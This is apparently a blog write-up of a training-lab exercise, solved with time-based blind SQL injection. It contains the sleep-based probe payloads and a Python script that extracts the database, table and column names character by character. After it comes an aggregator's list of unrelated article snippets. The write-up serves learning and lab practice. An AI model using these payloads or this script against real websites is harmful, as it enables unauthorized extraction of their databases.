chick&
chick&

sql(时间盲注)——墨者学院——漏洞操作记录

Sql时间盲注

1、 开始的页面,但是不是这个页面,点击下面的任性网页

sql(时间盲注)——墨者学院——漏洞操作记录_第1张图片

sql(时间盲注)——墨者学院——漏洞操作记录_第2张图片

2、提示再url中传参,加个逗号 ?type=1’

sql(时间盲注)——墨者学院——漏洞操作记录_第3张图片

既然提示是时间盲注,那就

?type=1’ and sleep(5)%23

没有时间延迟

去掉单引号

有时间延迟5秒

sql(时间盲注)——墨者学院——漏洞操作记录_第4张图片

因为是时间延迟,没有任何回显,那只能用python写脚本或者用sqlmap

这里是脚本,但是后面有错误,我找不到原因,只能查到flag、goods表的字段

import requests import datetime import time session = requests.Session() session.keep_alive = False # requests默认使用urllib3库,默认是长连接,改为false,关闭多余的连接 requests.adapters.DEFAULT_RETRIES = 8 # 设置重连次数,防止线程数过高,断开连接 def lenStr(name): for i in range(100): url = "http://219.153.49.228:44261/flag.php?type=1" payload = " and if(length("+str(name)+")="+str(i)+",sleep(2),1)" time1 = datetime.datetime.now() print(url+payload+'%23') r = session.get(url+payload+'%23') time2 = datetime.datetime.now() sec = (time2 - time1).seconds if sec > 1.5: print(str(name)+" len is %d" % i) return i global database_name def database(): name = 'database()' lenDB = lenStr(name) database_name = '' for i in range(1, lenDB+1): for j in '0123456789abcdefghijklmnopqrstuvwxyz': url = "http://219.153.49.228:44261/flag.php?type=1" payload = " and if(substr(database(),%d,1)='%s',sleep(2),1)" % (i, j) print(url+payload+"%23") time1 = datetime.datetime.now() r = session.get(url=url+payload+'%23') time2 = datetime.datetime.now() sec = (time2 - time1).seconds if sec > 1.5: database_name += j print("database:"+database_name) break def table(): global table_name table_name = '' name = "(select group_concat(table_name) from information_schema.tables where table_schema=database())" lenTB = lenStr(name) for i in range(lenTB+1): for j in '0123456789abcdefghijklmnopqrstuvwxyz,./`?<>-_=+~!@#$%^&*()': url = "http://219.153.49.228:44261/flag.php?type=1" payload = " and if(substr("+name+","+str(i)+",1)='"+j+"',sleep(2),1)" print(url+payload+"%23") time1 = datetime.datetime.now() r = session.get(url+payload+"%23") time2 = datetime.datetime.now() sec = (time2 - time1).seconds if sec > 1.5: table_name += j print("table:"+table_name) break def column(): global column_name column_name = '' list = table_name.split(",", -1) for TB in list: name = "(select group_concat(column_name) from information_schema.columns where table_name='"+TB+"')" lenCL = lenStr(name) for i in range(lenCL): for j in '0123456789abcdefghijklmnopqrstuvwxyz,./`?<>-_=+~!@#$%^&*()': url = "http://219.153.49.228:44261/flag.php?type=1" payload = " and if(substr("+name+","+str(i)+",1)='"+j+"',sleep(2),1)" print(url + payload + "%23") time1 = datetime.datetime.now() r = session.get(url + payload + "%23") time2 = datetime.datetime.now() sec = (time2 - time1).seconds if sec > 1.5: column_name += j print("table:"+TB+"ncolumn:"+column_name) break if __name__ == '__main__': #database() table() column()

还是用sqlmap扫把

sql(时间盲注)——墨者学院——漏洞操作记录_第5张图片

sql(时间盲注)——墨者学院——漏洞操作记录_第6张图片

爆数据库

sql(时间盲注)——墨者学院——漏洞操作记录_第7张图片

sql(时间盲注)——墨者学院——漏洞操作记录_第8张图片

爆表

sql(时间盲注)——墨者学院——漏洞操作记录_第9张图片

爆字段

sql(时间盲注)——墨者学院——漏洞操作记录_第10张图片

爆值

sql(时间盲注)——墨者学院——漏洞操作记录_第11张图片

回到第一个页面

sql(时间盲注)——墨者学院——漏洞操作记录_第12张图片

技术重点:时间盲注无回显,只能靠sleep判断。

手工注入:需猜表名等等,比较麻烦。考验基础。

你可能感兴趣的:(漏洞/靶场操作记录,安全漏洞)

  • Matrix-Breakout 2 Morpheus靶场解题过程
    信息收集目标探测靶机目标很明显就是61.139.2.141了扫描开放端口发现22、80、81访问端口主机访问80翻译一下,并没有发现什么审查源代码发现里面有一张图片,下载下来看看是否有图片的隐写wgethttp://61.139.2.141/trinity.jpegstegoveritas-itrinity.jpeg-o/home/kali/Desktop/11分解后发现什么都没有,里面的keep
  • ZAP漏洞扫描系列04:手动导入请求添加站点 宁儿数据安全 #安全测试安全
    ZAP漏洞扫描系列04:手动导入请求添加站点通过请求器“曲线救国”添加站点,可按以下步骤操作(本质是手动发请求让ZAP识别站点):GET请求步骤1:在请求器构造目标站点请求在请求器的“请求”编辑框,替换默认内容为:点击“发送(Send)”按钮,ZAP会向http://10.1.1.xx:8081/发请求。GEThttp://10.1.1.xx:8081/HTTP/1.1host:10.1.1.xx
  • C++98和C++11的构造和初始化、initializer_list以及decltype关键字(一般) 无聊看看天T^T C++从入门到入土c++开发语言
    目录前言C++98的构造与初始化C++11的构造与初始化初始化列表的initializer_listdecltype关键字前言2003年C++标准委员会曾经提交了一份技术勘误表(简称TC1),使得C++03这个名字取代了C++98成为了C++11前最新的C++标准名称。不过由于C++03主要是对C++98标准中的漏洞进行修复,语言的核心部分则没有改动,因此人们习惯性的把两个标准合并成为C++98/
  • portswigger靶场SSRF通关 Georgeh1 网络安全web安全安全系统安全网络攻击模型
    一、针对本地服务器的基本SSRF1、实验要求:该实验室具有库存检查功能,可以从内部系统获取数据。要解决该实验,请更改库存检查URL以访问管理界面,http://localhost/admin并删除用户carlos。2、实验步骤a、根据提示可以更改库存检查URL发现一个参数stockApib、将上述请求包发送重放器直接将参数更改为stockApi=http%3a%2f%2flocalhost%2fa
  • 掌握SQL注入:漏洞演示与防护策略实战源代码 May Wei
    本文还有配套的精品资源,点击获取简介:SQL注入是一个影响Web应用和数据库安全的漏洞。通过本项目源代码演示,开发者能深入理解SQL注入的工作机制及其攻击方法。文档和源代码示例将指导如何通过构造恶意SQL语句执行非授权数据库操作,以及如何通过实践学习防止此类攻击,包括安全编码、输入验证、错误处理、数据库权限设置和日志监控等。1.SQL注入概念和攻击方法1.1SQL注入漏洞的基本原理1.1.1SQL
  • 网络安全第14集 不灭锦鲤 web安全安全
    前言:小迪安全14集,这集重点内容:0、什么是js渗透测试?在javascript中也存在变量和函数,存在可控变量和函数就有可能存在在漏洞,js开发的web应用和php、java开发的区别是,js能看得到的源代码,php看不到,但是风险就是未授权访问、配置信息泄露(加密算法、key秘钥等),源代码看得到,存在更多的url泄露,从而可能会出现未授权访问,从url,前提:web应用可以采用前端语言或后
  • 拼多多的陷阱 努力做自己
    昨天临下班时看到朋友圈有发关于拼多多怎样拿到500元,说是每月一次漏洞,有详细的步骤。可能是太无聊了,竟然相信了,按照步骤操作,一直持续到晚上8点,还差0.01个金币,好几个朋友说很难拿,放弃吧,嗯,确实。今天一大早,鑫姐发来消息问,拿到了么,不行她再找几个朋友,一不小心,又激起我的小心思了,万一拿到了呢。明明只差0.01个金币,可能就差1个人了,结果又扫出了钻石,这又是什么鬼。然后集齐10个钻石
  • 薅羊毛群里的东西靠谱吗?最新薅羊毛赚钱项目 高省爱氧惠
    吃过薅羊毛项目红利的人应该都明白,羊毛群里面的东西真假皆有,而且薅羊毛这个东西大部分都是占灰色多一些,当然网创说的并不是绝对,也有不少薅羊毛的项目的确相当赚钱。也当然我说的赚钱就不代表它安全。好比如,当初拼多多红包漏洞一个道理,一晚上令拼多多平台损失上千万,而这笔大金额损失背后的身影就是薅羊毛的群体杰作。看到这里可能你们认为薅羊毛很赚钱,这一千万损失均分下来,每个人都应该赚了十几万吧!氧惠APP佣
  • 书香||有缺陷的圆满 北冰洋冷
    (本文参与书香专题活动,文责自负)圆满的意思是没有欠缺,漏洞,使人满意,完美无缺,完善。其反义词就是缺陷。但是,万事万物怎么可能十全十美,没有缺陷?所以,人不能圆满,事不能圆满,人生不能圆满,唯有心可以圆满,只有接受缺陷,人生才可以圆满。一、人不可能圆满。金无足赤,人无完人。人不能十全十美,每个人都会有自己的缺点和不足。上天总是公平的,给了你一些,必然会拿走一些,让每个人都会有,或多或少的遗憾和缺
  • 常见的未授权访问如:Redis,MongoDb,Memcached,Jenkins,Jupyter NoteBook,Elasticsearch,Kibana等二十四个靶场复现 终焉暴龙王 安全网络web安全
    前言这这篇文章中我会记录24种常见的未授权访问漏洞的靶场复现,如果有错误,欢迎大家指正。在本文中,漏洞复现的靶场完全是靠自己搭建的vulhub-master以及一系列的靶场以及fofa搜索,如果之前没有用过vulhub-master靶场,请先搭建好vulhub-master靶场并且安装docker和docker-compose。另外,其中一些涉及到敏感信息的漏洞复现我就不截图了,大家切记要树立好法
  • 零信任架构落地:Java + SPIFFE 微服务身份联邦体系 司铭鸿 架构java微服务机器学习线性代数开发语言算法
    “信任是最昂贵的漏洞。”——2017年Equifax数据泄露后安全专家总结开篇:当城堡护城河干涸时2019年,某跨国金融集团遭遇“服务间信任链断裂”攻击。攻击者利用Kubernetes服务账户令牌泄露,伪装成合法服务横向渗透,窃取核心交易数据。其传统边界防火墙与VPN如同中世纪的护城河,对内部流量毫无防御能力。这场灾难性事件点燃了他们落地零信任架构(ZeroTrustArchitecture,ZT
  • 从系统架构视角解析唯识学:感官模块的二层设计 & 认知系统的漏洞修复 109702008 杂谈系统架构人工智能
    作者:DeepSeek-R1标签:哲学与编程、认知科学、系统架构、佛教唯识引言:当哲学遇上系统设计在构建高可用系统时,我们常采用分层架构(如OSI七层模型)。有趣的是,1300年前的佛教唯识学派早已用类似思路解构人类认知系统。本文将用技术语言解析感官的二层模型(浮尘根/胜义根)与认知系统的两类漏洞(见惑/思惑),你会发现:佛学修行的本质竟是一场持续千年的“认知系统重构工程”。模块一:感官系统的硬件
  • 高级07-Java安全编程:保护你的应用免受攻击 Jinkxs Java高级篇安全java
    引言在当今的数字时代,应用程序的安全性已成为软件开发过程中不可忽视的重要环节。Java作为一门广泛应用于企业级应用开发的编程语言,其安全性问题尤其受到关注。无论是在Web应用、移动应用还是后端服务中,Java开发者都需要面对各种潜在的安全威胁,如SQL注入、跨站脚本攻击(XSS)、跨站请求伪造(CSRF)、身份验证漏洞等。因此,掌握Java安全编程的最佳实践,不仅能够提升应用程序的健壮性,还能有效
  • SRC实战 | 爆破新思路分享(非常详细)零基础入门到精通,收藏这一篇就够了 七七Seven~ 网络安全机器学习web安全服务器
    前一段时间挖到某高校一个高危漏洞,已经修复了,这里有一点搞爆破的新思路,在这里分享一下。其实,我刚开始的目标是某实验教学平台,看起来比较高大上,测试了一通没什么反应那当然不服气啊,然后我仔细一想,这种平台那肯定会给数据库接口出去,和各大高校对接用户信息,我挖不了你我就去其他地方挖,fofa指引我去了下面这个网页注意标红,这是我找到的所有对接的大学实验平台中最有可能有漏洞的,试了一下,直接弱口令11
  • 宝塔开放php openssl,[教程]Centos宝塔面板升级openssl增强nginxSSL安全性,openssl开启Http/2,Centos升级openssl... weixin_39956353 宝塔开放phpopenssl
    由于本站是采用的Centos7+宝塔面板搭建的LNMP环境,但是Centos7默认的openssl版本又太低,根据“漏洞参考这里:https://www.trustasia.com/OpenSSL-CVE-2016-2107-Padding-Oracle”查看这篇文章发现openssl低版本已经有一堆漏洞了,所以就萌生了升级openssl版本的想法。配置完后如图:openssl版本低会导致无论你怎
  • 宝塔linux升级,宝塔linux面板之升级OpenSSL教程 weixin_39598584 宝塔linux升级
    宝塔linux面板之升级OpenSSL教程,版本,教程,源代码,漏洞,服务器宝塔linux面板之升级OpenSSL教程易采站长站,站长之家为您整理了宝塔linux面板之升级OpenSSL教程的相关内容。下面由宝塔面板教程栏目给大家介绍升级OpenSSL教程,希望对需要的朋友有所帮助!升级OpenSSL教程(亲测可用)目前一些服务器的OpenSSL还是1.0.1e版本,今天进行服务器漏洞检测出现Op
  • 宝塔linux面板如何开启openssl,宝塔linux面板之升级OpenSSL教程 EdisonGzq
    下面由宝塔面板教程栏目给大家介绍升级OpenSSL教程,希望对需要的朋友有所帮助!升级OpenSSL教程(亲测可用)目前一些服务器的OpenSSL还是1.0.1e版本,今天进行服务器漏洞检测出现OpenSSL存在漏洞,那只能升级OpenSSL了。1、登录SSH,查看OpenSSL版本opensslversion2、下载源代码wgethttps://github.com/openssl/openss
  • NBA季后赛将迎来回到“魔鬼主场” 爵士期待赢回主动权,拭目以待 老夫讲球
    周四303NBA篮球灰熊VS森林狼比赛时间:2022-4-2207:30赛事分析:灰熊坐拥莫兰特这位准一流球星,在本轮系列赛是更被看好的一方。首场比赛,灰熊防守端漏洞百出,失去了主场优势。系列赛第二场,灰熊开局就奠定了优势,全场对唐斯的限制极为有效,最终以28分优势大胜对手,将大比分扳平,此役全队七人得分上双,莫兰特拿到了最高的23分9篮板10助攻,但其大腿受到了一定的伤病侵袭,贝恩和杰克逊均拿到
  • CVE-2025-6018 和 CVE-2025-6019漏洞引发的思考 深海科技服务 行业发展网络安全web安全程序人生java个人开发操作系统
    一、CVE-2025-6018和CVE-2025-6019漏洞对麒麟和统信UOS系统有影响吗?这两个漏洞确实对麒麟和统信UOS系统有影响。根据最新的信息,可以明确如下:1、CVE-2025-6018:LinuxPAM权限提升漏洞这个漏洞存在于LinuxPAM(可插拔认证模块)的配置中,可能允许远程登录系统的低权限用户获得polkit策略的“allow_active”认证,从而拥有与机器本地用户相同
  • Apache HTTP Server 2.4.50 中的路径遍历和文件泄露漏洞 (CVE-2021-42013)实验报告 shidfe 笔记apachehttp安全
    视频演示ApacheHTTPServer2.4.50中的路径遍历和文件泄露漏洞(CVE-2021-42013)实验演示_哔哩哔哩_bilibiliBGM:《芳华慢》+《霜雪千年》(by等什么君)https://www.bilibili.com/video/BV1Va411C7gW?spm_id_from=333.999.0.0参考文章Vulhub-Docker-Composefileforvuln
  • Apache HTTP Server 2.4.49 的目录遍历漏洞CVE-2021-41773
    一、ApacheHTTPServer2.4.49的目录遍历漏洞介绍CVE-2021-41773是一个影响ApacheHTTPServer2.4.49的目录遍历漏洞,允许远程攻击者绕过访问控制限制读取系统上任意文件。在某些配置下,它还可以进一步导致远程代码执行(RCE)。这个漏洞被加密货币矿工(如Linuxsys)所利用,构建了完整的攻击链用于传播恶意挖矿程序。下面是对此漏洞和“Linuxsys”矿
  • 读《高效人士的七个习惯》 | 笔记 | 以终为使2 学习的路上
    在P380页中作者关于家庭宣言的建议:包括互助合作、维持整洁、用言语表达感情、培养专长与欣赏家人的才华等等。每年6月与9月,即学年结束与开始之际,我们都会加以修订,使之更符合实际情况。读完这段话我觉得我目前家庭很难做到,因为我对目前的家人心中有芥蒂,老公对我的家人有芥蒂。老公与我对育儿观念不一样,如果想这样具体实施真的挺难的。并且发现原来我的家庭有这么大的问题以及漏洞。我该如何做呢?要去尊重他的家
  • 京东隐藏优惠券如何领取?京东隐藏优惠券app 直返APP京东优惠券
    京东隐藏优惠券是一种商家为了吸引消费者下单而设置的优惠券,通常在京东APP或者官网直接购买商品时看不到这种优惠券。京东隐藏优惠券有很多叫法,比如京东内部优惠券、大额券,京东漏洞券等。那么,京东隐藏优惠券怎么领?京东隐藏优惠券app又是什么?本文将为您详细解答。一、直返直返的口号是“返利就用直返”,它强调没有上级赚差价,直接为用户提供商家和消费者之间的综合优惠券返利平台。用户可以在直返上获取自己感兴
  • ubuntu22.04.4锁定内核应对海光服务器升级内核无法启动问题 大新新大浩浩 运维知识-ubuntu服务器运维
    文章目录一、场景二、机器信息1.内核信息2.CPU信息三、锁定内核总结ubuntu锁定内核的操作记录一、场景项目上来了几台海光的服务器,操作系统是ubuntu2204的,就尝试这安装服务,发现安装的时候内核会自动升级,升级之后新内核无法正常引导启动。进行锁内核的操作。二、机器信息1.内核信息hostnamectl:Statichostname:XXXIconname:computer-server
  • 第五十一章(对战妖兽王,受伤!) D王
    这个替补上场的妖兽王刚来就给了沈锦晨一个下马威,一个前扑加尾巴剪的连环招让沈锦晨狼狈不堪疲于应对。可交手几个回合后沈锦晨就发现了它的漏洞——妖兽王毕竟是妖兽,没有人类的思维和智慧,它的进攻太单调了,打来打去也就这么几个动作。所以沈锦晨就变换着招式跟它耗着,每当沈锦晨打出一个新的招式妖兽王总是会费一些劲去破解,一来二去精力和元气都损耗很大。按理说沈锦晨就应该这么跟它耗着慢慢取胜,但是他还要替师父争光
  • 技战法-多角度取证提升反制效果 YCL大摆子 网络安全
    一、技战法概述溯源反制核心目标通过对攻击源的追踪分析,精准定位攻击者身份信息(姓名、电话、邮箱、公司、网络ID、物理位置),构建完整攻击者画像。基于画像数据解析攻击手法特征(如漏洞利用路径、工具链偏好),预判后续攻击趋势并制定针对性防御策略。在攻防演习中强化蓝队取证能力,并为真实攻击事件提供司法取证支持(如协助公安机关固定电子证据链)。溯源反制双重价值防御能力提升:通过溯源案例复盘,暴露内部人员信
  • 常见漏洞描述及修复建议 _JINJI_ 常用知识web安全
    1.SQL注入漏洞漏洞描述Web程序中对于用户提交的参数未做过滤直接拼接到SQL语句中执行,导致参数中的特殊字符破坏了SQL语句原有逻辑,攻击者可以利用该漏洞执行任意SQL语句,如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。修复建议代码层最佳防御sql漏洞方案:使用预编译sql语句查询和绑定变量。使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有
  • IIS文件上传漏洞绕过:深入解析与高效防御
    目录一、IIS解析漏洞的底层逻辑二、绕过技巧:从基础到高级1.分号截断与路径拼接(经典手法)2.目录解析漏洞利用3.操作系统特性与字符混淆4.扩展名黑名单绕过5.结合其他漏洞的链式攻击三、防御方案:从代码到架构的多层防护1.代码层加固2.服务器配置优化3.网络层防护4.监控与应急响应四、实战复现:分阶段绕过防御五、总结与思考一、IIS解析漏洞的底层逻辑IIS(InternetInformation
  • Cacti 多行SNMP响应验证致代码执行漏洞(CVE-2025-22604) 毒手无盐虎 安全网络
    漏洞描述Cacti是一个开源的性能和故障管理框架。由于多行SNMP结果解析器中的漏洞,经过身份验证的用户可以在响应中注入恶意代码,在后续解析时导致命令执行漏洞。解决建议官方已发布1.2.29版本,建议升级至最新版本。参考链接https://github.com/Cacti/cacti/security/advisories/GHSA-c5j8-jxj3-hh36
  • 阿里云代理商:SSL篡改检测5步法——确保网站通信安全 v_junsouyun06 阿里云代理商阿里云优惠券阿里云服务器https安全网络协议
    目录一、什么是SSL篡改?二、SSL篡改检测5步法步骤1:检查SSL证书的合法性和完整性如何检查:工具推荐:步骤2:检查HTTPS连接的加密强度如何检查:工具推荐:步骤3:监控HTTP头和响应内容如何检查:工具推荐:步骤4:定期进行SSL证书的在线监控如何监控:工具推荐:步骤5:进行SSL漏洞扫描和渗透测试如何进行:工具推荐:三、总结在现代互联网环境中,SSL/TLS协议已成为确保网站与用户之间安
  • Java常用排序算法/程序员必须掌握的8大排序算法 cugfy java
    分类: 1)插入排序(直接插入排序、希尔排序) 2)交换排序(冒泡排序、快速排序) 3)选择排序(直接选择排序、堆排序) 4)归并排序 5)分配排序(基数排序) 所需辅助空间最多:归并排序 所需辅助空间最少:堆排序 平均速度最快:快速排序 不稳定:快速排序,希尔排序,堆排序。 先来看看8种排序之间的关系:   1.直接插入排序 (1
  • 【Spark102】Spark存储模块BlockManager剖析 bit1129 manager
    Spark围绕着BlockManager构建了存储模块,包括RDD,Shuffle,Broadcast的存储都使用了BlockManager。而BlockManager在实现上是一个针对每个应用的Master/Executor结构,即Driver上BlockManager充当了Master角色,而各个Slave上(具体到应用范围,就是Executor)的BlockManager充当了Slave角色
  • linux 查看端口被占用情况详解 daizj linux端口占用netstatlsof
    经常在启动一个程序会碰到端口被占用,这里讲一下怎么查看端口是否被占用,及哪个程序占用,怎么Kill掉已占用端口的程序   1、lsof -i:port port为端口号   [root@slave /data/spark-1.4.0-bin-cdh4]# lsof -i:8080 COMMAND   PID USER   FD   TY
  • Hosts文件使用 周凡杨 hostslocahost
         一切都要从localhost说起,经常在tomcat容器起动后,访问页面时输入http://localhost:8088/index.jsp,大家都知道localhost代表本机地址,如果本机IP是10.10.134.21,那就相当于http://10.10.134.21:8088/index.jsp,有时候也会看到http: 127.0.0.1:
  • java excel工具 g21121 Java excel
    直接上代码,一看就懂,利用的是jxl: import java.io.File; import java.io.IOException; import jxl.Cell; import jxl.Sheet; import jxl.Workbook; import jxl.read.biff.BiffException; import jxl.write.Label; import
  • web报表工具finereport常用函数的用法总结(数组函数) 老A不折腾 finereportweb报表函数总结
    ADD2ARRAY ADDARRAY(array,insertArray, start):在数组第start个位置插入insertArray中的所有元素,再返回该数组。 示例: ADDARRAY([3,4, 1, 5, 7], [23, 43, 22], 3)返回[3, 4, 23, 43, 22, 1, 5, 7]. ADDARRAY([3,4, 1, 5, 7], "测试&q
  • 游戏服务器网络带宽负载计算 墙头上一根草 服务器
    家庭所安装的4M,8M宽带。其中M是指,Mbits/S 其中要提前说明的是: 8bits = 1Byte 即8位等于1字节。我们硬盘大小50G。意思是50*1024M字节,约为 50000多字节。但是网宽是以“位”为单位的,所以,8Mbits就是1M字节。是容积体积的单位。 8Mbits/s后面的S是秒。8Mbits/s意思是 每秒8M位,即每秒1M字节。 我是在计算我们网络流量时想到的
  • 我的spring学习笔记2-IoC(反向控制 依赖注入) aijuans Spring 3 系列
    IoC(反向控制 依赖注入)这是Spring提出来了,这也是Spring一大特色。这里我不用多说,我们看Spring教程就可以了解。当然我们不用Spring也可以用IoC,下面我将介绍不用Spring的IoC。 IoC不是框架,她是java的技术,如今大多数轻量级的容器都会用到IoC技术。这里我就用一个例子来说明: 如:程序中有 Mysql.calss 、Oracle.class 、SqlSe
  • 高性能mysql 之 选择存储引擎(一) annan211 mysqlInnoDBMySQL引擎存储引擎
    1 没有特殊情况,应尽可能使用InnoDB存储引擎。   原因:InnoDB 和 MYIsAM 是mysql 最常用、使用最普遍的存储引擎。其中InnoDB是最重要、最广泛的存储引擎。她   被设计用来处理大量的短期事务。短期事务大部分情况下是正常提交的,很少有回滚的情况。InnoDB的性能和自动崩溃   恢复特性使得她在非事务型存储的需求中也非常流行,除非有非常
  • UDP网络编程 百合不是茶 UDP编程局域网组播
      UDP是基于无连接的,不可靠的传输   与TCP/IP相反       UDP实现私聊,发送方式客户端,接受方式服务器 package netUDP_sc; import java.net.DatagramPacket; import java.net.DatagramSocket; import java.net.Ine
  • JQuery对象的val()方法执行结果分析 bijian1013 JavaScriptjsjquery
            JavaScript中,如果id对应的标签不存在(同理JAVA中,如果对象不存在),则调用它的方法会报错或抛异常。在实际开发中,发现JQuery在id对应的标签不存在时,调其val()方法不会报错,结果是undefined。        
  • http请求测试实例(采用json-lib解析) bijian1013 jsonhttp
            由于fastjson只支持JDK1.5版本,因些对于JDK1.4的项目,可以采用json-lib来解析JSON数据。如下是http请求的另外一种写法,仅供参考。 package com; import java.util.HashMap; import java.util.Map; import
  • 【RPC框架Hessian四】Hessian与Spring集成 bit1129 hessian
    在【RPC框架Hessian二】Hessian 对象序列化和反序列化一文中介绍了基于Hessian的RPC服务的实现步骤,在那里使用Hessian提供的API完成基于Hessian的RPC服务开发和客户端调用,本文使用Spring对Hessian的集成来实现Hessian的RPC调用。   定义模型、接口和服务器端代码 |---Model    &nb
  • 【Mahout三】基于Mahout CBayes算法的20newsgroup流程分析 bit1129 Mahout
    1.Mahout环境搭建  1.下载Mahout http://mirror.bit.edu.cn/apache/mahout/0.10.0/mahout-distribution-0.10.0.tar.gz    2.解压Mahout  3. 配置环境变量 vim /etc/profile export HADOOP_HOME=/home
  • nginx负载tomcat遇非80时的转发问题 ronin47
      nginx负载后端容器是tomcat(其它容器如WAS,JBOSS暂没发现这个问题)非80端口,遇到跳转异常问题。解决的思路是:$host:port        详细如下:    该问题是最先发现的,由于之前对nginx不是特别的熟悉所以该问题是个入门级别的: ? 1 2 3 4 5
  • java-17-在一个字符串中找到第一个只出现一次的字符 bylijinnan java
    public class FirstShowOnlyOnceElement { /**Q17.在一个字符串中找到第一个只出现一次的字符。如输入abaccdeff,则输出b * 1.int[] count:count[i]表示i对应字符出现的次数 * 2.将26个英文字母映射:a-z <--> 0-25 * 3.假设全部字母都是小写 */ pu
  • mongoDB 复制集 开窍的石头 mongodb
    mongo的复制集就像mysql的主从数据库,当你往其中的主复制集(primary)写数据的时候,副复制集(secondary)会自动同步主复制集(Primary)的数据,当主复制集挂掉以后其中的一个副复制集会自动成为主复制集。提供服务器的可用性。和防止当机问题             mo
  • [宇宙与天文]宇宙时代的经济学 comsci 经济
        宇宙尺度的交通工具一般都体型巨大,造价高昂。。。。。      在宇宙中进行航行,近程采用反作用力类型的发动机,需要消耗少量矿石燃料,中远程航行要采用量子或者聚变反应堆发动机,进行超空间跳跃,要消耗大量高纯度水晶体能源      以目前地球上国家的经济发展水平来讲,
  • Git忽略文件 Cwind git
         有很多文件不必使用git管理。例如Eclipse或其他IDE生成的项目文件,编译生成的各种目标或临时文件等。使用git status时,会在Untracked files里面看到这些文件列表,在一次需要添加的文件比较多时(使用git add . / git add -u),会把这些所有的未跟踪文件添加进索引。 ==== ==== ==== 一些牢骚
  • MySQL连接数据库的必须配置 dashuaifu mysql连接数据库配置
    MySQL连接数据库的必须配置   1.driverClass:com.mysql.jdbc.Driver   2.jdbcUrl:jdbc:mysql://localhost:3306/dbname   3.user:username   4.password:password   其中1是驱动名;2是url,这里的‘dbna
  • 一生要养成的60个习惯 dcj3sjt126com 习惯
    一生要养成的60个习惯 第1篇 让你更受大家欢迎的习惯 1 守时,不准时赴约,让别人等,会失去很多机会。 如何做到: ①该起床时就起床, ②养成任何事情都提前15分钟的习惯。 ③带本可以随时阅读的书,如果早了就拿出来读读。 ④有条理,生活没条理最容易耽误时间。 ⑤提前计划:将重要和不重要的事情岔开。 ⑥今天就准备好明天要穿的衣服。 ⑦按时睡觉,这会让按时起床更容易。 2 注重
  • [介绍]Yii 是什么 dcj3sjt126com PHPyii2
    Yii 是一个高性能,基于组件的 PHP 框架,用于快速开发现代 Web 应用程序。名字 Yii (读作 易)在中文里有“极致简单与不断演变”两重含义,也可看作 Yes It Is! 的缩写。 Yii 最适合做什么? Yii 是一个通用的 Web 编程框架,即可以用于开发各种用 PHP 构建的 Web 应用。因为基于组件的框架结构和设计精巧的缓存支持,它特别适合开发大型应
  • Linux SSH常用总结 eksliang linux sshSSHD
    转载请出自出处:http://eksliang.iteye.com/blog/2186931 一、连接到远程主机   格式: ssh name@remoteserver 例如: ssh [email protected]   二、连接到远程主机指定的端口   格式: ssh name@remoteserver -p 22 例如: ssh i
  • 快速上传头像到服务端工具类FaceUtil gundumw100 android
    快速迭代用 import java.io.DataOutputStream; import java.io.File; import java.io.FileInputStream; import java.io.FileNotFoundException; import java.io.FileOutputStream; import java.io.IOExceptio
  • jQuery入门之怎么使用 ini JavaScripthtmljqueryWebcss
    jQuery的强大我何问起(个人主页:hovertree.com)就不用多说了,那么怎么使用jQuery呢?   首先,下载jquery。下载地址:http://hovertree.com/hvtart/bjae/b8627323101a4994.htm,一个是压缩版本,一个是未压缩版本,如果在开发测试阶段,可以使用未压缩版本,实际应用一般使用压缩版本(min)。然后就在页面上引用。
  • 带filter的hbase查询优化 kane_xie 查询优化hbaseRandomRowFilter
    问题描述 hbase scan数据缓慢,server端出现LeaseException。hbase写入缓慢。   问题原因 直接原因是: hbase client端每次和regionserver交互的时候,都会在服务器端生成一个Lease,Lease的有效期由参数hbase.regionserver.lease.period确定。如果hbase scan需
  • java设计模式-单例模式 men4661273 java单例枚举反射IOC
             单例模式1,饿汉模式 //饿汉式单例类.在类初始化时,已经自行实例化 public class Singleton1 { //私有的默认构造函数 private Singleton1() {} //已经自行实例化 private static final Singleton1 singl
  • mongodb 查询某一天所有信息的3种方法,根据日期查询 qiaolevip 每天进步一点点学习永无止境mongodb纵观千象
    // mongodb的查询真让人难以琢磨,就查询单天信息,都需要花费一番功夫才行。 // 第一种方式: coll.aggregate([ {$project:{sendDate: {$substr: ['$sendTime', 0, 10]}, sendTime: 1, content:1}}, {$match:{sendDate: '2015-
  • 二维数组转换成JSON tangqi609567707 java二维数组json
    原文出处:http://blog.csdn.net/springsen/article/details/7833596 public class Demo {     public static void main(String[] args) {        String[][] blogL
  • erlang supervisor wudixiaotie erlang
    定义supervisor时,如果是监控celuesimple_one_for_one则删除children的时候就用supervisor:terminate_child (SupModuleName, ChildPid),如果shutdown策略选择的是brutal_kill,那么supervisor会调用exit(ChildPid, kill),这样的话如果Child的behavior是gen_
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他